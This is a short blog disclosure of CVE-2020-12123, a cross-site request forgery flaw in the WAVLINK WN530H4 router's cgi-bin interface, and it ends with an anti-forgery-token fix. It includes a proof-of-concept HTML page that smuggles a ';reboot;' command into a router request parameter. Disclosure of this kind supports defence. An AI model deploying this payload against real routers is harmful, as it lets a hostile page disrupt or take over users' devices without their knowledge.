cerne.xyz
Home

CVE-2020-12123

This vulnerability is a Cross-Site Request Forgery (CSRF) in the WAVLINK WN530H4 router.

Many endpoints in the web interface /cgi-bin/ directory are vulnerable to CSRF. This effectively allows other websites to submit requests to the router page without the user knowing – even if the router manufacturers patch the cgi-bin authentication bypass (however, the attack will only work if the admin is logged in).

Malicious websites with hoards of router vulnerabilities could create traps on the Internet with maliciously-crafted websites that trigger vulnerabilities in the router. As an example, consider this malicious HTML page.


<html>
    <head>
        <title>Reboot!</title>
        <script src = "http://192.168.10.1/cgi-bin/live_api.cgi?page=hacked&id=1337&ip=;reboot;"></script>
   </head>
   <body>
       <h1>This webpage reboots the WAVLINK router.</h1>
   </body>
</html>

This malicious HTML exploits the command line injection vulnerability “remotely” by rebooting the router (effectively causing a denial of service). An unsuspecting user could succumb themselves to this attack if they click a link with this vulnerable code. Of course, many more vulnerable attacks can be executed – including malicious binaries being downloaded remotely and executed.

To solve this, the router must employ protections. One such protection is employing anti-forgery tokens. It seems that the router manufacturers try this by protecting most of the webpages with a token, but none of the cgi-bin endpoints are protected by this, rendering this defense useless.

For more information and vulnerability analysis, please see my report on the WAVLINK WN530H4.